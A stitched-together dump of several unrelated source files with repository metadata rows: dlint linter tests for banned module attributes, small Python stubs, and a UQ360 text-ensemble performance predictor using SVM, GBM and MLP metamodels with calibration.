linter.visit(python_node)
result = linter.get_results()
expected = []
assert result == expected
def test_empty_illegal_module_attributes(self):
python_node = self.get_ast_node(
"""
import os
var = 'test'
os.path.join(var)
"""
)
linter = get_bad_module_attribute_use_implementation({})
linter.visit(python_node)
result = linter.get_results()
expected = []
assert result == expected
def test_module_attribute_usage(self):
python_node = self.get_ast_node(
"""
import foo
var = 'echo "TEST"'
foo.bar(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_as_usage(self):
python_node = self.get_ast_node(
"""
import foo.bar as baz
var = 'echo "TEST"'
baz.qux(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo.bar': ['qux']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_import_from_usage(self):
python_node = self.get_ast_node(
"""
from foo import bar
var = 'echo "TEST"'
bar(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=2,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_import_from_as_usage(self):
python_node = self.get_ast_node(
"""
from foo.bar import baz as qux
var = 'echo "TEST"'
qux(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo.bar': ['baz']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=2,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_from_wildcard_usage(self):
python_node = self.get_ast_node(
"""
from foo import *
var = 'echo "TEST"'
bar(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
),
]
assert result == expected
def test_multiple_bad_attributes_usage(self):
python_node = self.get_ast_node(
"""
import foo
var = 'echo "TEST"'
foo.bar(var)
foo.baz(var)
"""
)
linter = get_bad_module_attribute_use_implementation(
{'foo': ['bar', 'baz']}
)
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=7,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_multiple_bad_modules_usage(self):
python_node = self.get_ast_node(
"""
import foo
import baz
var = 'echo "TEST"'
foo.bar(var)
baz.qux(var)
"""
)
linter = get_bad_module_attribute_use_implementation(
{'foo': ['bar'], 'baz': ['qux']}
)
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=7,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=8,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_multiple_module_depth_usage(self):
python_node = self.get_ast_node(
"""
import foo.bar.baz
var = 'echo "TEST"'
foo.bar.baz.qux(var)
"""
)
linter = get_bad_module_attribute_use_implementation(
{'foo.bar.baz': ['qux']}
)
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
),
]
assert result == expected
def test_multiple_module_depth_from_usage(self):
python_node = self.get_ast_node(
"""
from foo import bar
var = 'echo "TEST"'
bar.baz.qux(var)
"""
)
linter = get_bad_module_attribute_use_implementation(
{'foo.bar.baz': ['qux']}
)
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
),
]
assert result == expected
def test_no_module_attribute_usage(self):
python_node = self.get_ast_node(
"""
import os
var = 'test'
os.path.join(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
linter.visit(python_node)
result = linter.get_results()
expected = []
assert result == expected
def test_bad_module_class_use(self):
python_node = self.get_ast_node(
"""
import foo
bar = foo.Bar()
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['Bar']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=4,
col_offset=6,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_missing_import_usage(self):
python_node = self.get_ast_node(
"""
import baz
from qux import quine
from . import xyz
var = 'echo "TEST"'
foo = None
foo.bar(var)
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
linter.visit(python_node)
result = linter.get_results()
expected = []
assert result == expected
def test_module_attribute_arbitrary_depth_usage_legacy(self):
python_node = self.get_ast_node(
"""
import m1
from m1 import m2
from m1.m2 import m3
from m1.m2.m3 import m4
m1.m2.m3.m4.bad_attribute()
m2.m3.m4.bad_attribute()
m3.m4.bad_attribute()
m4.bad_attribute()
"""
)
linter = get_bad_module_attribute_use_implementation({
'm1.m2.m3.m4': ['bad_attribute'],
'm2.m3.m4': ['bad_attribute'],
'm3.m4': ['bad_attribute'],
'm4': ['bad_attribute'],
})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=7,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=8,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=9,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=10,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_arbitrary_depth_usage_new(self):
python_node = self.get_ast_node(
"""
import m1
from m1 import m2
from m1.m2 import m3
from m1.m2.m3 import m4
m1.m2.m3.m4.bad_attribute()
m2.m3.m4.bad_attribute()
m3.m4.bad_attribute()
m4.bad_attribute()
"""
)
linter = get_bad_module_attribute_use_implementation({
'm1.m2.m3.m4': ['bad_attribute'],
})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=7,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=8,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=9,
col_offset=0,
message=linter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=10,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_arbitrary_import_depth_usage_new(self):
python_strings = [
"""
import m1
m1.m2.m3.m4.bad_attribute()
""",
"""
import m1.m2
m1.m2.m3.m4.bad_attribute()
""",
"""
import m1.m2.m3
m1.m2.m3.m4.bad_attribute()
""",
"""
import m1.m2.m3.m4
m1.m2.m3.m4.bad_attribute()
""",
]
for python_string in python_strings:
python_node = self.get_ast_node(python_string)
linter = get_bad_module_attribute_use_implementation({
'm1.m2.m3.m4': ['bad_attribute'],
})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=3,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_arbitrary_import_as_depth_usage_new(self):
python_strings = [
"""
import m1 as alias
alias.m2.m3.m4.bad_attribute()
""",
"""
import m1.m2 as alias
alias.m3.m4.bad_attribute()
""",
"""
import m1.m2.m3 as alias
alias.m4.bad_attribute()
""",
"""
import m1.m2.m3.m4 as alias
alias.bad_attribute()
""",
]
for python_string in python_strings:
python_node = self.get_ast_node(python_string)
linter = get_bad_module_attribute_use_implementation({
'm1.m2.m3.m4': ['bad_attribute'],
})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=3,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_arbitrary_from_import_as_depth_usage_new(self):
python_strings = [
"""
from m1 import m2 as alias
alias.m3.m4.bad_attribute()
""",
"""
from m1.m2 import m3 as alias
alias.m4.bad_attribute()
""",
"""
from m1.m2.m3 import m4 as alias
alias.bad_attribute()
""",
]
for python_string in python_strings:
python_node = self.get_ast_node(python_string)
linter = get_bad_module_attribute_use_implementation({
'm1.m2.m3.m4': ['bad_attribute'],
})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=3,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_arbitrary_from_import_wildcard_depth_usage_new(self):
python_strings = [
"""
from m1 import *
m2.m3.m4.bad_attribute()
""",
"""
from m1.m2 import *
m3.m4.bad_attribute()
""",
"""
from m1.m2.m3 import *
m4.bad_attribute()
""",
]
for python_string in python_strings:
python_node = self.get_ast_node(python_string)
linter = get_bad_module_attribute_use_implementation({
'm1.m2.m3.m4': ['bad_attribute'],
})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=3,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
def test_module_attribute_usage_nested(self):
python_node = self.get_ast_node(
"""
import foo
var = 'echo "TEST"'
foo.bar(var).baz()
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
linter.visit(python_node)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=linter._error_tmpl
)
]
assert result == expected
if __name__ == "__main__":
unittest.main()
| 25.432348
| 90
| 0.496423
| 1,561
| 16,353
| 4.898142
| 0.063421
| 0.054931
| 0.0531
| 0.091551
| 0.914334
| 0.913942
| 0.906356
| 0.895762
| 0.870521
| 0.844755
| 0
| 0.022118
| 0.411117
| 16,353
| 642
| 91
| 25.471963
| 0.771859
| 0.001223
| 0
| 0.676471
| 0
| 0
| 0.027105
| 0
| 0
| 0
| 0
| 0
| 0.05615
| 1
| 0.061497
| false
| 0
| 0.029412
| 0.002674
| 0.106952
| 0.002674
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a18a577cbd51e975117b7ec1bc30711aca8a257a
| 143
|
py
|
Python
|
data-analysis-by-python/chapter4-2.py
|
matbird/StudyPy
|
3f822c823ecd4d2200f3aae2d1a69a0374914bf3
|
[
"Apache-2.0"
] | null | null | null |
data-analysis-by-python/chapter4-2.py
|
matbird/StudyPy
|
3f822c823ecd4d2200f3aae2d1a69a0374914bf3
|
[
"Apache-2.0"
] | null | null | null |
data-analysis-by-python/chapter4-2.py
|
matbird/StudyPy
|
3f822c823ecd4d2200f3aae2d1a69a0374914bf3
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from numpy.random import randn
from pandas import Series,DataFrame
import pandas as pd
if __name__ == '__main__':
pass
| 17.875
| 35
| 0.769231
| 22
| 143
| 4.636364
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 143
| 8
| 36
| 17.875
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.166667
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
a1bb08b76c261aca0b62bc02b4e704f1655babdc
| 140
|
py
|
Python
|
{{cookiecutter.project_slug}}/{{cookiecutter.main_app}}/apps.py
|
huogerac/cookiecutter-djangofloppyforms
|
0a2c1d7fe506a5df13aaefde0f716373dbb8194e
|
[
"BSD-3-Clause"
] | 3
|
2021-03-29T19:11:30.000Z
|
2021-05-08T13:18:41.000Z
|
{{cookiecutter.project_slug}}/{{cookiecutter.main_app}}/apps.py
|
huogerac/cookiecutter-djangofloppyforms
|
0a2c1d7fe506a5df13aaefde0f716373dbb8194e
|
[
"BSD-3-Clause"
] | null | null | null |
{{cookiecutter.project_slug}}/{{cookiecutter.main_app}}/apps.py
|
huogerac/cookiecutter-djangofloppyforms
|
0a2c1d7fe506a5df13aaefde0f716373dbb8194e
|
[
"BSD-3-Clause"
] | 2
|
2021-03-12T15:13:38.000Z
|
2021-07-01T19:38:11.000Z
|
from django.apps import AppConfig
class {{ cookiecutter.main_app|capitalize }}Config(AppConfig):
name = '{{ cookiecutter.main_app }}'
| 23.333333
| 62
| 0.735714
| 16
| 140
| 6.3125
| 0.75
| 0.316832
| 0.376238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135714
| 140
| 5
| 63
| 28
| 0.834711
| 0
| 0
| 0
| 0
| 0
| 0.192857
| 0.15
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a1cd9c36c94a33abde9b9407040c70844d22a358
| 158
|
py
|
Python
|
util/test/tests/GL/GL_Buffer_Truncation.py
|
PLohrmannAMD/renderdoc
|
ea16d31aa340581f5e505e0c734a8468e5d3d47f
|
[
"MIT"
] | 6,181
|
2015-01-07T11:49:11.000Z
|
2022-03-31T21:46:55.000Z
|
util/test/tests/GL/GL_Buffer_Truncation.py
|
PLohrmannAMD/renderdoc
|
ea16d31aa340581f5e505e0c734a8468e5d3d47f
|
[
"MIT"
] | 2,015
|
2015-01-16T01:45:25.000Z
|
2022-03-25T12:01:06.000Z
|
util/test/tests/GL/GL_Buffer_Truncation.py
|
PLohrmannAMD/renderdoc
|
ea16d31aa340581f5e505e0c734a8468e5d3d47f
|
[
"MIT"
] | 1,088
|
2015-01-06T08:36:25.000Z
|
2022-03-30T03:31:21.000Z
|
import rdtest
import renderdoc as rd
class GL_Buffer_Truncation(rdtest.Buffer_Truncation):
demos_test_name = 'GL_Buffer_Truncation'
internal = False
| 22.571429
| 53
| 0.803797
| 21
| 158
| 5.714286
| 0.666667
| 0.4
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14557
| 158
| 7
| 54
| 22.571429
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.125786
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
629a9240d857ed3ad7105763a0a21438f33252ca
| 34
|
py
|
Python
|
Hello.py
|
FlorinCostin81/session1
|
72238b217a78b5c1d5dff8cbe57cf541dce13915
|
[
"MIT"
] | null | null | null |
Hello.py
|
FlorinCostin81/session1
|
72238b217a78b5c1d5dff8cbe57cf541dce13915
|
[
"MIT"
] | null | null | null |
Hello.py
|
FlorinCostin81/session1
|
72238b217a78b5c1d5dff8cbe57cf541dce13915
|
[
"MIT"
] | null | null | null |
print("Hello world khsdldsjslw!")
| 17
| 33
| 0.764706
| 4
| 34
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 2
| 33
| 17
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
62cc561445256bd2409e4ceaf65687cd188f6fa2
| 19,137
|
py
|
Python
|
uq360/algorithms/blackbox_metamodel/predictors/core/short_text.py
|
Sclare87/UQ360
|
2378bfa4a8d61f813afbf6854341888434c9eb11
|
[
"Apache-2.0"
] | 148
|
2021-05-27T20:52:51.000Z
|
2022-03-16T22:49:48.000Z
|
uq360/algorithms/blackbox_metamodel/predictors/core/short_text.py
|
Sclare87/UQ360
|
2378bfa4a8d61f813afbf6854341888434c9eb11
|
[
"Apache-2.0"
] | 9
|
2021-06-21T18:45:07.000Z
|
2021-11-08T14:42:30.000Z
|
uq360/algorithms/blackbox_metamodel/predictors/core/short_text.py
|
Sclare87/UQ360
|
2378bfa4a8d61f813afbf6854341888434c9eb11
|
[
"Apache-2.0"
] | 27
|
2021-06-01T18:29:02.000Z
|
2022-03-02T06:56:03.000Z
|
# Licensed Materials - Property of IBM
#
# 95992503
#
# (C) Copyright IBM Corp. 2019, 2020 All Rights Reserved.
#
from collections import Counter
import sys
import numpy as np
from sklearn.model_selection import StratifiedKFold, train_test_split
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
from uq360.algorithms.blackbox_metamodel.predictors.base.predictor_base import PerfPredictor
from uq360.utils.hpo_search import CustomRandomSearch
from uq360.utils.calibrators.calibrator import Calibrator
import logging
# import numpy as np
# from sklearn.model_selection import StratifiedKFold, train_test_split
# from sklearn.ensemble import GradientBoostingClassifier
# from sklearn.neural_network import MLPClassifier
# from sklearn.svm import SVC
# from .performance_predictor import PerfPredictor
# from ..hpo_search import CustomRandomSearch
# from ..calibrators.calibrator import Calibrator
import logging
logger = logging.getLogger(__name__)
"""
Performance predictor for short text data. It is based on an ensemble of meta-models:
one mlp metamodel, one GBM metamodel, and one SVM metamodel. This performance predictor does not have a method
to quantify its own uncertainty, so the uncertainty values are zero.
"""
class TextEnsemblePredictor(PerfPredictor):
def __init__(self, calibrator="shift"):
self.metamodels_considered = ["svm", "gbm", "mlp"]
self.metamodels = {}
self.metamodel_calibrators = {}
self.return_all_true = False
self.return_all_false = False
self.x_test = None
self.y_test = None
self.random_state = 42
self._object_registry = {}
self.fit_status = False
# A dictionary to stash any whitebox features the prediction has that can be used in the uncertainty model
self.whitebox_features = {}
logger.info("Calibrator: %s", calibrator)
if calibrator is None:
self.metamodel_calibrators = None
else:
for metamodel in self.metamodels_considered:
self.metamodel_calibrators[metamodel] = Calibrator.instance(calibrator)
@classmethod
def name(cls):
return ('text_ensemble')
def fit(self, x_test_unprocessed, x_test, y_test):
self.x_test = x_test
self.y_test = y_test
x_test = x_test.values
# Don't split off test set for calibration if calibrator = None
if self.metamodel_calibrators is not None:
try:
x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test,
test_size=0.25,
stratify=y_test,
random_state=self.random_state)
except Exception as e:
# sometimes it may not be possible to stratify - when all the predictors are correct or incorrect.
# fall back to regular train test split and these conditions will be handled downstream
x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test, test_size=0.2,
random_state=self.random_state)
else:
x_dev = x_test
y_dev = y_test
if len(np.unique(y_dev)) == 1:
if 1 in y_dev:
self.return_all_true = True
print(
'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
self.fit_status = True
return
else:
self.return_all_false = True
print(
'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
self.fit_status = True
return
# Balance datasets
x_dev, y_dev = self._balance_data(x_dev, y_dev)
mlp_parameters = {
"hidden_layer_sizes": [(100,),
(100, 100, 100,),
(300, 300,),
(400, 300, 200, 100,)],
"activation": ['logistic', 'relu'],
"early_stopping": [True],
"learning_rate": ['constant', 'adaptive'],
"alpha": [0.00001, 0.0001, 0.001]
}
svm_parameters = {
'C': [0.1, 1, 10, 100, 1000],
'gamma': [1, 0.1, 0.01, 0.001, 0.0001],
'kernel': ['rbf', 'linear', 'poly','sigmoid']
}
gbm_parameters = {
"loss": ["deviance"],
"learning_rate": [0.1, 0.15, 0.2],
"min_samples_split": np.linspace(0.005, 0.01, 5),
"min_samples_leaf": np.linspace(0.0005, 0.001, 5),
"max_leaf_nodes": list(range(3, 12, 2)),
"max_features": ["log2", "sqrt"],
"subsample": np.linspace(0.3, 0.9, 6),
"n_estimators": range(100, 401, 50)
}
randomized_params = {
"n_iter": 20,
"scoring": "f1",
"n_jobs": -1,
"cv": StratifiedKFold(n_splits=3, shuffle=True),
"verbose": 0,
"return_train_score": True,
"progress_bar": False,
"random_state": self.random_state}
classifier1 = GradientBoostingClassifier()
gbm_classifier = CustomRandomSearch(classifier1, gbm_parameters, **randomized_params)
gbm = None
if 'gbm' in self.metamodels_considered:
gbm_classifier.fit(x_dev, y_dev)
gbm = gbm_classifier.best_estimator_
self.metamodels["gbm"] = gbm
logger.info("Building GBM Model is complete")
classifier2 = MLPClassifier()
mlp_classifier = CustomRandomSearch(classifier2, mlp_parameters, **randomized_params)
mlp = None
if 'mlp' in self.metamodels_considered:
mlp_classifier.fit(x_dev, y_dev)
mlp = mlp_classifier.best_estimator_
self.metamodels["mlp"] = mlp
logger.info("Building MLP Model is complete")
classifier3 = SVC(probability=True,max_iter=10000)
svm_classifier = CustomRandomSearch(classifier3, svm_parameters, **randomized_params)
svm = None
if 'svm' in self.metamodels_considered:
svm_classifier.fit(x_dev, y_dev)
svm = svm_classifier.best_estimator_
logger.info("Building SVM Model is complete")
self.metamodels["svm"] = svm
# If calibrator is not None, fit
if self.metamodel_calibrators is not None:
if len(np.unique(y_test)) == 1:
if 1 in y_test:
self.return_all_true = True
print(
'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
self.fit_status = True
return
else:
self.return_all_false = True
print(
'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
self.fit_status = True
return
logger.info("Metamodels considered %s", self.metamodels_considered)
for mm in self.metamodels_considered:
model = self.metamodels[mm]
preds = model.predict_proba(x_test)
preds = preds[:, 1]
self.metamodel_calibrators[mm].fit(preds, y_test)
self.fit_status = True
def predict(self, X_unprocessed, X):
X = X.values
assert self.fit_status
if self.return_all_true:
preds = 0.99999999 * np.ones(X.shape[0])
output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
return output
if self.return_all_false:
preds = 0 * np.ones(X.shape[0])
output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
return output
confidences = []
for mm in self.metamodels_considered:
logger.info("Predicting against metamodel %s", mm)
model = self.metamodels[mm]
preds = model.predict_proba(X)
preds = preds[:, 1]
if self.metamodel_calibrators:
out = self.metamodel_calibrators[mm].predict(preds)
out = list(map(lambda x: 0 if x < 0 else x, out))
out = list(map(lambda x: 1 if x > 1 else x, out))
confidences.append(out)
else:
confidences.append(preds)
preds = confidences
confidences = np.maximum(np.mean(preds, axis=0), 0.0)
output = {'confidences': confidences, 'uncertainties': np.zeros(confidences.shape)}
return output
def save(self, output_location):
pass
def load(self, input_location):
pass
#
#
# import numpy as np
# from sklearn.model_selection import StratifiedKFold, train_test_split
# from sklearn.ensemble import GradientBoostingClassifier
# from sklearn.neural_network import MLPClassifier
# from sklearn.svm import SVC
# from uq360.algorithms.blackbox_metamodel.predictors.base.predictor_base import PerfPredictor
# from uq360.utils.hpo_search import CustomRandomSearch
# from uq360.utils.calibrators.calibrator import Calibrator
# import logging
#
# logger = logging.getLogger(__name__)
#
# """
# This version of the text ensemble predictor does an "inner" and "outer calibration".
# Note: For calibration, we just set aside one small subset of data and reuse it for inner and outer calibration
#
# Logic:
# fit()
# Take every meta model, create a calib object per meta model (N objects). predict against the meta model and fit() one calibrator per meta model. (inner calib)
# As you create one calib per metamodel, save the predictions and obtain the mean confidences. Use this to fit a "master calibrator" (outer calib)
#
# predict()
# obtain confidences against every single meta model. pass the confidences to the calibrator's predict().
# grab the mean of confidences that come from N calibrators (inner calib)
# pass the mean of confidences to the "master calibrator" and predict() again. (outer calib)
#
# """
#
#
# class TextEnsembleV2Predictor(PerfPredictor):
#
# def __init__(self, calibrator="isotonic_regression"):
# self.metamodels_considered = ["svm", "gbm", "mlp"]
# self.metamodels = {}
# self.metamodel_calibrators = {}
#
# self.return_all_true = False
# self.return_all_false = False
# self.x_test = None
# self.y_test = None
# self.random_state = 42
# self._object_registry = {}
# self.fit_status = False
#
# # A dictionary to stash any whitebox features the prediction has that can be used in the uncertainty model
# self.whitebox_features = {}
#
# logger.info("Calibrator: %s", calibrator)
# if calibrator is None:
# self.metamodel_calibrators = None
# else:
# for metamodel in self.metamodels_considered:
# self.metamodel_calibrators[metamodel] = Calibrator.instance(calibrator)
#
# if calibrator is None:
# self.calibrator = None
# else:
# self.calibrator = Calibrator.instance(calibrator)
#
# @classmethod
# def name(cls):
# return ('text_ensemble')
#
# def fit(self, x_test_unprocessed, x_test, y_test):
# self.x_test = x_test
# self.y_test = y_test
#
# x_test = x_test.values
#
# # Don't split off test set for calibration if calibrator = None
# if self.metamodel_calibrators is not None:
# try:
# x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test,
# test_size=0.25,
# stratify=y_test,
# random_state=self.random_state)
#
# except Exception as e:
# # sometimes it may not be possible to stratify - when all the predictors are correct or incorrect.
# # fall back to regular train test split and these conditions will be handled downstream
# x_dev, x_test, y_dev, y_test = train_test_split(x_test, y_test, test_size=0.2,
# random_state=self.random_state)
# else:
# x_dev = x_test
# y_dev = y_test
#
# if len(np.unique(y_dev)) == 1:
# if 1 in y_dev:
# self.return_all_true = True
# print(
# 'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
# self.fit_status = True
# return
# else:
# self.return_all_false = True
# print(
# 'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
# self.fit_status = True
# return
# # Balance datasets
# x_dev, y_dev = self._balance_data(x_dev, y_dev)
# mlp_parameters = {
# "hidden_layer_sizes": [(100,),
# (100, 100, 100,),
# (300, 300,),
# (400, 300, 200, 100,)],
# "activation": ['logistic', 'relu'],
# "early_stopping": [True],
# "learning_rate": ['constant', 'adaptive'],
# "alpha": [0.00001, 0.0001, 0.001]
# }
#
# svm_parameters = {
# 'C': [0.1, 1, 10, 100, 1000],
# 'gamma': [1, 0.1, 0.01, 0.001, 0.0001],
# 'kernel': ['rbf', 'linear', 'poly', 'sigmoid']
# }
#
# gbm_parameters = {
# "loss": ["deviance"],
# "learning_rate": [0.1, 0.15, 0.2],
# "min_samples_split": np.linspace(0.005, 0.01, 5),
# "min_samples_leaf": np.linspace(0.0005, 0.001, 5),
# "max_leaf_nodes": list(range(3, 12, 2)),
# "max_features": ["log2", "sqrt"],
# "subsample": np.linspace(0.3, 0.9, 6),
# "n_estimators": range(100, 401, 50)
# }
#
# randomized_params = {
# "n_iter": 20,
# "scoring": "f1",
# "n_jobs": -1,
# "cv": StratifiedKFold(n_splits=3, shuffle=True),
# "verbose": 0,
# "return_train_score": True,
# "progress_bar": False,
# "random_state": self.random_state}
# classifier1 = GradientBoostingClassifier()
# gbm_classifier = CustomRandomSearch(classifier1, gbm_parameters, **randomized_params)
#
# gbm = None
#
# if 'gbm' in self.metamodels_considered:
# gbm_classifier.fit(x_dev, y_dev)
# gbm = gbm_classifier.best_estimator_
# self.metamodels["gbm"] = gbm
# logger.info("Building GBM Model is complete")
#
# classifier2 = MLPClassifier()
# mlp_classifier = CustomRandomSearch(classifier2, mlp_parameters, **randomized_params)
#
# mlp = None
#
# if 'mlp' in self.metamodels_considered:
# mlp_classifier.fit(x_dev, y_dev)
# mlp = mlp_classifier.best_estimator_
#
# self.metamodels["mlp"] = mlp
# logger.info("Building MLP Model is complete")
#
# classifier3 = SVC(probability=True, max_iter=10000)
# svm_classifier = CustomRandomSearch(classifier3, svm_parameters, **randomized_params)
# svm = None
#
# if 'svm' in self.metamodels_considered:
# svm_classifier.fit(x_dev, y_dev)
# svm = svm_classifier.best_estimator_
#
# logger.info("Building SVM Model is complete")
# self.metamodels["svm"] = svm
#
# meta_preds = []
# # If calibrator is not None, fit
# if self.metamodel_calibrators is not None:
# if len(np.unique(y_test)) == 1:
# if 1 in y_test:
# self.return_all_true = True
# print(
# 'The base model has an accuracy of 100 percent on the test set. Return predictions of only 100 percent')
# self.fit_status = True
# return
# else:
# self.return_all_false = True
# print(
# 'The base model has an accuracy of 0 percent on the test set. Return predictions of only 0 percent')
# self.fit_status = True
# return
#
# logger.info("Metamodels considered %s", self.metamodels_considered)
# for mm in self.metamodels_considered:
# model = self.metamodels[mm]
# preds = model.predict_proba(x_test)
#
# meta_preds.append(preds)
# preds = preds[:, 1]
# self.metamodel_calibrators[mm].fit(preds, y_test)
#
# meta_preds = np.asarray(meta_preds)
# meta_preds = np.mean(meta_preds, axis=0)
# meta_preds = meta_preds[:, 1]
#
# self.calibrator.fit(meta_preds, y_test)
#
# self.fit_status = True
#
# def predict(self, X_unprocessed, X):
# X = X.values
# assert self.fit_status
# if self.return_all_true:
# preds = 0.99999999 * np.ones(X.shape[0])
# output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
# return output
#
# if self.return_all_false:
# preds = 0 * np.ones(X.shape[0])
# output = {'confidences': preds, 'uncertainties': np.zeros(preds.shape)}
# return output
#
# confidences = []
# for mm in self.metamodels_considered:
# logger.info("Predicting against metamodel %s", mm)
# model = self.metamodels[mm]
# preds = model.predict_proba(X)
